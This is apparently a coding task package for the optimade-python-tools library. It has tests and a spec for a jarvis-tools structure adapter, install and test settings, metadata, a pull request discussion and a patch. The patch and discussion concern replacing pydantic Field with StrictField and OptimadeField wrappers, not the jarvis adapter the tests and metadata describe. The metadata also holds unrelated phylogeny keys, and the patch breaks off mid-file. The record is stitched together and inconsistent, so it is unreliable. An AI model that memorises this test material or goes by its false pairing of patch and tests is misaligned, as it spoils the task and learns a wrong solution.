diff --git a/tests/adapters/structures/test_jarvis.py b/tests/adapters/structures/test_jarvis.py new file mode 100644 index 00000000..929ba425 --- /dev/null +++ b/tests/adapters/structures/test_jarvis.py @@ -0,0 +1,53 @@ +# pylint: disable=import-error +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("jarvis-tools") +jarvis = pytest.importorskip( + "jarvis", + minversion=min_ver, + reason=f"jarvis-tools must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from jarvis.core.atoms import Atoms +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.jarvis import get_jarvis_atoms + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_jarvis_atoms(Structure(structure)), Atoms) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_jarvis_atoms(null_position_structure), Atoms) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_jarvis_atoms(null_lattice_vector_structure), Atoms) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + # Since all the special species structure only have a single species, this works fine. 
+ if len(structure.species[0].chemical_symbols) > 1: + # If the structure is disordered (has partial occupancies of any kind), + # jarvis-tools cannot convert the structure + with pytest.raises( + ConversionError, + match="jarvis-tools cannot handle structures with partial occupancies", + ): + get_jarvis_atoms(structure) + else: + # No partial occupancies, just special/non-standard species. + # jarvis-tools should convert these structure fine enough. + assert isinstance(get_jarvis_atoms(structure), Atoms) diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index 3cea1eab..1e950c9f 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -8,6 +8,7 @@ try: import ase # noqa: F401 import numpy # noqa: F401 import pymatgen # noqa: F401 + import jarvis # noqa: F401 except ImportError: all_modules_found = False else: @@ -107,10 +108,11 @@ class TestStructure: "ase": ["ase"], "numpy": ["cif", "pdb", "pdbx_mmcif"], "pymatgen": ["pymatgen"], + "jarvis": ["jarvis"], } modules_to_test = [] - for module in ("aiida", "ase", "numpy", "pymatgen"): + for module in ("aiida", "ase", "numpy", "pymatgen", "jarvis"): try: importlib.import_module(module) except (ImportError, ModuleNotFoundError):
[ "tests/adapters/structures/test_structures.py::TestStructure::test_instantiate", "tests/adapters/structures/test_structures.py::TestStructure::test_setting_entry", "tests/adapters/structures/test_structures.py::TestStructure::test_convert", "tests/adapters/structures/test_structures.py::TestStructure::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::TestStructure::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_no_module_conversion", "tests/adapters/structures/test_structures.py::TestStructure::test_common_converters" ]
[]
Function: get_jarvis_atoms(optimade_structure: OptimadeStructure) -> Atoms Location: optimade.adapters.structures.jarvis.get_jarvis_atoms Inputs: - **optimade_structure**: An instance of `optimade.models.StructureResource` (or any object exposing the same attribute layout) representing an OPTIMADE structure. The object must provide `attributes` containing `lattice_vectors`, `species`, `cartesian_site_positions`, and `structure_features`. Outputs: - Returns a `jarvis.core.atoms.Atoms` instance constructed from the supplied OPTIMADE structure data. - Returns `None` (with a warning) if the `jarvis-tools` package is not installed. Description: Converts a valid OPTIMADE `StructureResource` into a `jarvis.core.atoms.Atoms` object. The conversion pads missing site positions, rejects structures that contain partial occupancies (raising `ConversionError`), and maps lattice vectors, element symbols, and Cartesian coordinates to the JARVIS `Atoms` representation.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_jarvis.py tests/adapters/structures/test_structures.py" }
{ "num_modified_files": 3, "num_modified_lines": 56, "pr_author": "knc6", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/usnistgov/jarvis" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests support for jarvis‑tools structures. The added tests verify that a get_jarvis_atoms adapter correctly converts OPTIMADE structures, handles null positions/lattice vectors, special species, and raises an error for partial occupancies. The implementation in the golden patch directly satisfies these test expectations, and the tests do not introduce unrelated requirements, so the task is solvable without environment‑preparation problems.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
06dd2be63200ad094a8926a488f26ae7f0609c93
2020-08-05 14:43:13
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=h1) Report > Merging [#453](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e965bc8051b776c88ca93f3ff4d5a48ea99b88ef&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #453 +/- ## ======================================= Coverage 91.26% 91.26% ======================================= Files 60 60 Lines 2815 2815 ======================================= Hits 2569 2569 Misses 246 246 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `91.26% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453/diff?src=pr&el=tree#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `95.62% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=footer). 
Last update [e965bc8...8b00825](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). CasperWA: > Following the discussion in #399, this PR is a place to try out ways of incorporating the "SHOULD" level of support for some fields in the specification. This PR does the following: > > * adds a couple of wrappers around pydantic's `Field` (namely `OptimadeField` and `StrictField`). > > * `StrictField` disallows keys outside of the pydantic `Field` signature, plus a couple of extras that we use (`unit`, `pattern` and `uniqueItems`), unfortunately. It emits a warning if a description is not supplied. Any tips on how to do this in a more pydantic way would be appreciated... > * `OptimadeField` calls `StrictField` but also forces all fields to supply a `queryable` and a `support` attribute for all fields > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... ml-evs: > I am not sure why you're getting the issues concerning the tests and `re' matching. But I've provided a suggested change for you to try out :) +1 > I wonder if we can do this in Config of a parent model instead, but perhaps not. Perhaps this is the best way. It's at least quite elegant in the end, I think. At least for what it is. Yeah, I think the only other option is to define OptimadeModel(BaseModel) and StrictModel(BaseModel), but I think that would involve a fair bit more hackery. > Otherwise we should create a custom JSON encoder that can do all this and be used when creating the OpenAPI specification? Yep, I think we have no other choice if we want this stuff in the schema. 
ml-evs: > > ``` > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. > > ``` > > Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... I only changed them because I didn't like that I had to allow `pattern` through `StrictField` as a special case, but then I couldn't get rid of it for the URL regex anyway. I guess you're right, it is redundant for the const case (I doubt it even runs the regex?) Happy to revert this one if you want. CasperWA: > > > ``` > > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. > > > ``` > > > > > > Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... > > I only changed them because I didn't like that I had to allow `pattern` through `StrictField` as a special case, but then I couldn't get rid of it for the URL regex anyway. I guess you're right, it is redundant for the const case (I doubt it even runs the regex?) Happy to revert this one if you want. I'm pretty sure the `const` value is simply set at some point and the validation is then run. So for these values I'd rather just revert to not uneccesarily clutter the list of validators. It's a form of an OpenAPI schema hack already as it is ;) And indeed, `pattern` is added as a result of the `regex`, but `regex` also adds a validator. ml-evs: > I'm pretty sure the `const` value is simply set at some point and the validation is then run. So for these values I'd rather just revert to not uneccesarily clutter the list of validators. 
It's a form of an OpenAPI schema hack already as it is ;) Yep, fair, reverted. ml-evs: Have squashed this down to 3 commits, so ready when you are happy with it @CasperWA. ml-evs: Annoyingly GH was hiding some remaining unresolved comments, so feel free to disagree with me on those still...
materials-consortia__optimade-python-tools-453
diff --git a/openapi/openapi.json b/openapi/openapi.json index cb4f49c6..8a315390 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -2116,7 +2116,8 @@ "properties": { "name": { "title": "Name", - "type": "string" + "type": "string", + "description": "Full name of the person, REQUIRED." }, "firstname": { "title": "Firstname", @@ -2128,7 +2129,8 @@ "type": "string", "description": "Last name of the person." } - } + }, + "description": "A person, i.e., an author, editor or other." }, "Provider": { "title": "Provider", @@ -2836,7 +2838,8 @@ "properties": { "name": { "title": "Name", - "type": "string" + "type": "string", + "description": "Gives the name of the species; the **name** value MUST be unique in the `species` list." }, "chemical_symbols": { "title": "Chemical Symbols", diff --git a/optimade/models/baseinfo.py b/optimade/models/baseinfo.py index 78796084..71d013d8 100644 --- a/optimade/models/baseinfo.py +++ b/optimade/models/baseinfo.py @@ -5,7 +5,7 @@ from typing import Dict, List, Optional from pydantic import BaseModel, AnyHttpUrl, Field, validator, root_validator from optimade.models.jsonapi import Resource -from optimade.models.utils import SemanticVersion +from optimade.models.utils import SemanticVersion, StrictField __all__ = ("AvailableApiVersion", "BaseInfoAttributes", "BaseInfoResource") @@ -14,13 +14,13 @@ __all__ = ("AvailableApiVersion", "BaseInfoAttributes", "BaseInfoResource") class AvailableApiVersion(BaseModel): """A JSON object containing information about an available API version""" - url: AnyHttpUrl = Field( + url: AnyHttpUrl = StrictField( ..., description="A string specifying a versioned base URL that MUST adhere to the rules in section Base URL", pattern=r".+/v[0-1](\.[0-9]+)*/?$", ) - version: SemanticVersion = Field( + version: SemanticVersion = StrictField( ..., description="""A string containing the full version number of the API served at that versioned base URL. 
The version number string MUST NOT be prefixed by, e.g., 'v'. @@ -59,27 +59,27 @@ Examples: `1.0.0`, `1.0.0-rc.2`.""", class BaseInfoAttributes(BaseModel): """Attributes for Base URL Info endpoint""" - api_version: SemanticVersion = Field( + api_version: SemanticVersion = StrictField( ..., description="""Presently used full version of the OPTIMADE API. The version number string MUST NOT be prefixed by, e.g., "v". Examples: `1.0.0`, `1.0.0-rc.2`.""", ) - available_api_versions: List[AvailableApiVersion] = Field( + available_api_versions: List[AvailableApiVersion] = StrictField( ..., description="A list of dictionaries of available API versions at other base URLs", ) - formats: List[str] = Field( + formats: List[str] = StrictField( default=["json"], description="List of available output formats." ) - available_endpoints: List[str] = Field( + available_endpoints: List[str] = StrictField( ..., description="List of available endpoints (i.e., the string to be appended to the versioned base URL).", ) - entry_types_by_format: Dict[str, List[str]] = Field( + entry_types_by_format: Dict[str, List[str]] = StrictField( ..., description="Available entry endpoints as a function of output formats." ) - is_index: Optional[bool] = Field( + is_index: Optional[bool] = StrictField( default=False, description="If true, this is an index meta-database base URL (see section Index Meta-Database). 
" "If this member is not provided, the client MUST assume this is not an index meta-database base URL " diff --git a/optimade/models/entries.py b/optimade/models/entries.py index a0f16769..9a74189a 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -5,6 +5,7 @@ from pydantic import BaseModel, Field, validator # pylint: disable=no-name-in-m from optimade.models.jsonapi import Relationships, Attributes, Resource from optimade.models.optimade_json import Relationship, DataType +from optimade.models.utils import StrictField, OptimadeField, SupportLevel __all__ = ( @@ -42,12 +43,12 @@ class StructureRelationship(TypedRelationship): class EntryRelationships(Relationships): """This model wraps the JSON API Relationships to include type-specific top level keys. """ - references: Optional[ReferenceRelationship] = Field( + references: Optional[ReferenceRelationship] = StrictField( None, description="Object containing links to relationships with entries of the `references` type.", ) - structures: Optional[StructureRelationship] = Field( + structures: Optional[StructureRelationship] = StrictField( None, description="Object containing links to relationships with entries of the `structures` type.", ) @@ -56,7 +57,7 @@ class EntryRelationships(Relationships): class EntryResourceAttributes(Attributes): """Contains key-value pairs representing the entry's properties.""" - immutable_id: Optional[str] = Field( + immutable_id: Optional[str] = OptimadeField( None, description="""The entry's immutable ID (e.g., an UUID). This is important for databases having preferred IDs that point to "the latest version" of a record, but still offer access to older variants. This ID maps to the version-specific record, in case it changes in the future. 
@@ -69,9 +70,11 @@ class EntryResourceAttributes(Attributes): - **Examples**: - `"8bd3e750-b477-41a0-9b11-3a799f21b44f"` - `"fjeiwoj,54;@=%<>#32"` (Strings that are not URL-safe are allowed.)""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.MUST, ) - last_modified: datetime = Field( + last_modified: datetime = OptimadeField( ..., description="""Date and time representing when the entry was last modified. @@ -84,13 +87,15 @@ class EntryResourceAttributes(Attributes): - **Example**: - As part of JSON response format: `"2007-04-05T14:30:20Z"` (i.e., encoded as an [RFC 3339 Internet Date/Time Format](https://tools.ietf.org/html/rfc3339#section-5.6) string.)""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) class EntryResource(Resource): """The base model for an entry resource.""" - id: str = Field( + id: str = OptimadeField( ..., description="""An entry's ID as defined in section Definition of Terms. @@ -107,6 +112,8 @@ class EntryResource(Resource): - `"cod/2000000@1234567"` - `"nomad/L1234567890"` - `"42"`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) type: str = Field( @@ -122,15 +129,17 @@ class EntryResource(Resource): - The entry of type `<type>` and ID `<id>` MUST be returned in response to a request for `/<type>/<id>` under the versioned base URL. - **Example**: `"structures"`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) - attributes: EntryResourceAttributes = Field( + attributes: EntryResourceAttributes = StrictField( ..., description="""A dictionary, containing key-value pairs representing the entry's properties, except for `type` and `id`. 
Database-provider-specific properties need to include the database-provider-specific prefix (see section on Database-Provider-Specific Namespace Prefixes).""", ) - relationships: Optional[EntryRelationships] = Field( + relationships: Optional[EntryRelationships] = StrictField( None, description="""A dictionary containing references to other entries according to the description in section Relationships encoded as [JSON API Relationships](https://jsonapi.org/format/1.0/#document-resource-object-relationships). The OPTIONAL human-readable description of the relationship MAY be provided in the `description` field inside the `meta` dictionary of the JSON API resource identifier object.""", @@ -139,24 +148,24 @@ The OPTIONAL human-readable description of the relationship MAY be provided in t class EntryInfoProperty(BaseModel): - description: str = Field( + description: str = StrictField( ..., description="A human-readable description of the entry property" ) - unit: Optional[str] = Field( + unit: Optional[str] = StrictField( None, description="""The physical unit of the entry property. This MUST be a valid representation of units according to version 2.1 of [The Unified Code for Units of Measure](https://unitsofmeasure.org/ucum.html). It is RECOMMENDED that non-standard (non-SI) units are described in the description for the property.""", ) - sortable: Optional[bool] = Field( + sortable: Optional[bool] = StrictField( None, description="""Defines whether the entry property can be used for sorting with the "sort" parameter. If the entry listing endpoint supports sorting, this key MUST be present for sortable properties with value `true`.""", ) - type: Optional[DataType] = Field( + type: Optional[DataType] = StrictField( None, description="""The type of the property's value. This MUST be any of the types defined in the Data types section. 
@@ -168,18 +177,18 @@ E.g., for the entry resource `structures`, the `species` property is defined as class EntryInfoResource(BaseModel): - formats: List[str] = Field( + formats: List[str] = StrictField( ..., description="List of output formats available for this type of entry." ) - description: str = Field(..., description="Description of the entry.") + description: str = StrictField(..., description="Description of the entry.") - properties: Dict[str, EntryInfoProperty] = Field( + properties: Dict[str, EntryInfoProperty] = StrictField( ..., description="A dictionary describing queryable properties for this entry type, where each key is a property name.", ) - output_fields_by_format: Dict[str, List[str]] = Field( + output_fields_by_format: Dict[str, List[str]] = StrictField( ..., description="Dictionary of available output fields for this entry type, where the keys are the values of the `formats` list and the values are the keys of the `properties` dictionary.", ) diff --git a/optimade/models/index_metadb.py b/optimade/models/index_metadb.py index de8e7672..c84f866b 100644 --- a/optimade/models/index_metadb.py +++ b/optimade/models/index_metadb.py @@ -6,6 +6,7 @@ from typing import Union, Dict from optimade.models.jsonapi import BaseResource from optimade.models.baseinfo import BaseInfoAttributes, BaseInfoResource +from optimade.models.utils import StrictField __all__ = ( @@ -25,7 +26,7 @@ class DefaultRelationship(Enum): class IndexInfoAttributes(BaseInfoAttributes): """Attributes for Base URL Info endpoint for an Index Meta-Database""" - is_index: bool = Field( + is_index: bool = StrictField( True, const=True, description="This must be `true` since this is an index meta-database (see section Index Meta-Database).", @@ -35,13 +36,13 @@ class IndexInfoAttributes(BaseInfoAttributes): class RelatedLinksResource(BaseResource): """A related Links resource object""" - type: str = Field("links", const="links", pattern="^links$") + type: str = Field("links", 
const="links", regex="^links$") class IndexRelationship(BaseModel): """Index Meta-Database relationship""" - data: Union[None, RelatedLinksResource] = Field( + data: Union[None, RelatedLinksResource] = StrictField( ..., description="""[JSON API resource linkage](http://jsonapi.org/format/1.0/#document-links). It MUST be either `null` or contain a single Links identifier object with the fields `id` and `type`""", @@ -52,7 +53,9 @@ class IndexInfoResource(BaseInfoResource): """Index Meta-Database Base URL Info endpoint resource""" attributes: IndexInfoAttributes = Field(...) - relationships: Union[None, Dict[DefaultRelationship, IndexRelationship]] = Field( + relationships: Union[ + None, Dict[DefaultRelationship, IndexRelationship] + ] = StrictField( ..., description="""Reference to the Links identifier object under the `links` endpoint that the provider has chosen as their 'default' OPTIMADE API database. A client SHOULD present this database as the first choice when an end-user chooses this provider.""", diff --git a/optimade/models/jsonapi.py b/optimade/models/jsonapi.py index 34bf1e4e..910fc8ed 100644 --- a/optimade/models/jsonapi.py +++ b/optimade/models/jsonapi.py @@ -5,10 +5,10 @@ from datetime import datetime, timezone from pydantic import ( # pylint: disable=no-name-in-module BaseModel, AnyUrl, - Field, parse_obj_as, root_validator, ) +from optimade.models.utils import StrictField __all__ = ( @@ -39,8 +39,8 @@ class Meta(BaseModel): class Link(BaseModel): """A link **MUST** be represented as either: a string containing the link's URL or a link object.""" - href: AnyUrl = Field(..., description="a string containing the link’s URL.") - meta: Optional[Meta] = Field( + href: AnyUrl = StrictField(..., description="a string containing the link’s URL.") + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about the link.", ) @@ -49,29 +49,35 @@ class Link(BaseModel): class JsonApi(BaseModel): """An object 
describing the server's implementation""" - version: str = Field(default="1.0", description="Version of the json API used") - meta: Optional[Meta] = Field(None, description="Non-standard meta information") + version: str = StrictField( + default="1.0", description="Version of the json API used" + ) + meta: Optional[Meta] = StrictField( + None, description="Non-standard meta information" + ) class ToplevelLinks(BaseModel): """A set of Links objects, possibly including pagination""" - self: Optional[Union[AnyUrl, Link]] = Field(None, description="A link to itself") - related: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( + None, description="A link to itself" + ) + related: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A related resource link" ) # Pagination - first: Optional[Union[AnyUrl, Link]] = Field( + first: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The first page of data" ) - last: Optional[Union[AnyUrl, Link]] = Field( + last: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The last page of data" ) - prev: Optional[Union[AnyUrl, Link]] = Field( + prev: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The previous page of data" ) - next: Optional[Union[AnyUrl, Link]] = Field( + next: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The next page of data" ) @@ -94,7 +100,7 @@ class ToplevelLinks(BaseModel): class ErrorLinks(BaseModel): """A Links object specific to Error objects""" - about: Optional[Union[AnyUrl, Link]] = Field( + about: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A link that leads to further details about this particular occurrence of the problem.", ) @@ -103,12 +109,12 @@ class ErrorLinks(BaseModel): class ErrorSource(BaseModel): """an object containing references to the source of the error""" - pointer: Optional[str] = Field( + pointer: Optional[str] = StrictField( None, description="a JSON 
Pointer [RFC6901] to the associated entity in the request document " '[e.g. "/data" for a primary data object, or "/data/attributes/title" for a specific attribute].', ) - parameter: Optional[str] = Field( + parameter: Optional[str] = StrictField( None, description="a string indicating which URI query parameter caused the error.", ) @@ -117,34 +123,34 @@ class ErrorSource(BaseModel): class Error(BaseModel): """An error response""" - id: Optional[str] = Field( + id: Optional[str] = StrictField( None, description="A unique identifier for this particular occurrence of the problem.", ) - links: Optional[ErrorLinks] = Field( + links: Optional[ErrorLinks] = StrictField( None, description="A links object storing about" ) - status: Optional[str] = Field( + status: Optional[str] = StrictField( None, description="the HTTP status code applicable to this problem, expressed as a string value.", ) - code: Optional[str] = Field( + code: Optional[str] = StrictField( None, description="an application-specific error code, expressed as a string value.", ) - title: Optional[str] = Field( + title: Optional[str] = StrictField( None, description="A short, human-readable summary of the problem. 
" "It **SHOULD NOT** change from occurrence to occurrence of the problem, except for purposes of localization.", ) - detail: Optional[str] = Field( + detail: Optional[str] = StrictField( None, description="A human-readable explanation specific to this occurrence of the problem.", ) - source: Optional[ErrorSource] = Field( + source: Optional[ErrorSource] = StrictField( None, description="An object containing references to the source of the error" ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about the error.", ) @@ -156,8 +162,8 @@ class Error(BaseModel): class BaseResource(BaseModel): """Minimum requirements to represent a Resource""" - id: str = Field(..., description="Resource ID") - type: str = Field(..., description="Resource type") + id: str = StrictField(..., description="Resource ID") + type: str = StrictField(..., description="Resource type") class Config: @staticmethod @@ -189,14 +195,14 @@ class RelationshipLinks(BaseModel): """ - self: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( None, description="""A link for the relationship itself (a 'relationship link'). This link allows the client to directly manipulate the relationship. When fetched successfully, this link returns the [linkage](https://jsonapi.org/format/1.0/#document-resource-object-linkage) for the related resources as its primary data. 
(See [Fetching Relationships](https://jsonapi.org/format/1.0/#fetching-relationships).)""", ) - related: Optional[Union[AnyUrl, Link]] = Field( + related: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A [related resource link](https://jsonapi.org/format/1.0/#document-resource-object-related-resource-links).", ) @@ -216,14 +222,14 @@ When fetched successfully, this link returns the [linkage](https://jsonapi.org/f class Relationship(BaseModel): """Representation references from the resource object in which it’s defined to other resource objects.""" - links: Optional[RelationshipLinks] = Field( + links: Optional[RelationshipLinks] = StrictField( None, description="a links object containing at least one of the following: self, related", ) - data: Optional[Union[BaseResource, List[BaseResource]]] = Field( - None, description="Resource linkage", uniqueItems=True + data: Optional[Union[BaseResource, List[BaseResource]]] = StrictField( + None, description="Resource linkage" ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object that contains non-standard meta-information about the relationship.", ) @@ -262,7 +268,7 @@ class Relationships(BaseModel): class ResourceLinks(BaseModel): """A Resource Links object""" - self: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A link that identifies the resource represented by the resource object.", ) @@ -295,18 +301,18 @@ class Attributes(BaseModel): class Resource(BaseResource): """Resource objects appear in a JSON API document to represent resources.""" - links: Optional[ResourceLinks] = Field( + links: Optional[ResourceLinks] = StrictField( None, description="a links object containing links related to the resource." 
) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about a resource that can not be represented as an attribute or relationship.", ) - attributes: Optional[Attributes] = Field( + attributes: Optional[Attributes] = StrictField( None, description="an attributes object representing some of the resource’s data.", ) - relationships: Optional[Relationships] = Field( + relationships: Optional[Relationships] = StrictField( None, description="""[Relationships object](https://jsonapi.org/format/1.0/#document-resource-object-relationships) describing relationships between the resource and other JSON API resources.""", @@ -316,23 +322,23 @@ describing relationships between the resource and other JSON API resources.""", class Response(BaseModel): """A top-level response""" - data: Optional[Union[None, Resource, List[Resource]]] = Field( + data: Optional[Union[None, Resource, List[Resource]]] = StrictField( None, description="Outputted Data", uniqueItems=True ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="A meta object containing non-standard information related to the Success", ) - errors: Optional[List[Error]] = Field( + errors: Optional[List[Error]] = StrictField( None, description="A list of unique errors", uniqueItems=True ) - included: Optional[List[Resource]] = Field( + included: Optional[List[Resource]] = StrictField( None, description="A list of unique included resources", uniqueItems=True ) - links: Optional[ToplevelLinks] = Field( + links: Optional[ToplevelLinks] = StrictField( None, description="Links associated with the primary data or errors" ) - jsonapi: Optional[JsonApi] = Field( + jsonapi: Optional[JsonApi] = StrictField( None, description="Information about the JSON API used" ) diff --git a/optimade/models/links.py b/optimade/models/links.py index c6e6c57a..4598435a 100644 --- a/optimade/models/links.py +++ 
b/optimade/models/links.py @@ -2,7 +2,6 @@ from enum import Enum from pydantic import ( # pylint: disable=no-name-in-module - Field, AnyUrl, root_validator, ) @@ -10,6 +9,7 @@ from typing import Union, Optional from optimade.models.jsonapi import Link, Attributes from optimade.models.entries import EntryResource +from optimade.models.utils import StrictField __all__ = ( @@ -39,31 +39,31 @@ class Aggregate(Enum): class LinksResourceAttributes(Attributes): """Links endpoint resource object attributes""" - name: str = Field( + name: str = StrictField( ..., description="Human-readable name for the OPTIMADE API implementation, e.g., for use in clients to show the name to the end-user.", ) - description: str = Field( + description: str = StrictField( ..., description="Human-readable description for the OPTIMADE API implementation, e.g., for use in clients to show a description to the end-user.", ) - base_url: Optional[Union[AnyUrl, Link]] = Field( + base_url: Optional[Union[AnyUrl, Link]] = StrictField( ..., description="JSON API links object, pointing to the base URL for this implementation", ) - homepage: Optional[Union[AnyUrl, Link]] = Field( + homepage: Optional[Union[AnyUrl, Link]] = StrictField( ..., description="JSON API links object, pointing to a homepage URL for this implementation", ) - link_type: LinkType = Field( + link_type: LinkType = StrictField( ..., description="""The type of the linked relation. MUST be one of these values: 'child', 'root', 'external', 'providers'.""", ) - aggregate: Optional[Aggregate] = Field( + aggregate: Optional[Aggregate] = StrictField( "ok", description="""A string indicating whether a client that is following links to aggregate results from different OPTIMADE implementations should follow this link or not. This flag SHOULD NOT be indicated for links where `link_type` is not `child`. 
@@ -77,7 +77,7 @@ A client MAY follow the link anyway if it has reason to do so (e.g., if the clie If specified, it MUST be one of the values listed in section Link Aggregate Options.""", ) - no_aggregate_reason: Optional[str] = Field( + no_aggregate_reason: Optional[str] = StrictField( None, description="""An OPTIONAL human-readable string indicating the reason for suggesting not to aggregate results following the link. It SHOULD NOT be present if `aggregate`=`ok`.""", @@ -87,14 +87,14 @@ It SHOULD NOT be present if `aggregate`=`ok`.""", class LinksResource(EntryResource): """A Links endpoint resource object""" - type: str = Field( + type: str = StrictField( "links", const="links", description="These objects are described in detail in the section Links Endpoint", pattern="^links$", ) - attributes: LinksResourceAttributes = Field( + attributes: LinksResourceAttributes = StrictField( ..., description="A dictionary containing key-value pairs representing the Links resource's properties.", ) diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index 07ad1840..75372afd 100644 --- a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -2,13 +2,13 @@ # pylint: disable=no-self-argument,no-name-in-module from enum import Enum -from pydantic import Field, root_validator, BaseModel, AnyHttpUrl, AnyUrl, EmailStr +from pydantic import root_validator, BaseModel, AnyHttpUrl, AnyUrl, EmailStr from typing import Optional, Union, List, Dict, Type, Any from datetime import datetime from optimade.models import jsonapi -from optimade.models.utils import SemanticVersion +from optimade.models.utils import SemanticVersion, StrictField __all__ = ( @@ -126,7 +126,7 @@ class DataType(Enum): class OptimadeError(jsonapi.Error): """detail MUST be present""" - detail: str = Field( + detail: str = StrictField( ..., description="A human-readable explanation specific to this occurrence of the problem.", ) @@ -144,7 +144,7 @@ class 
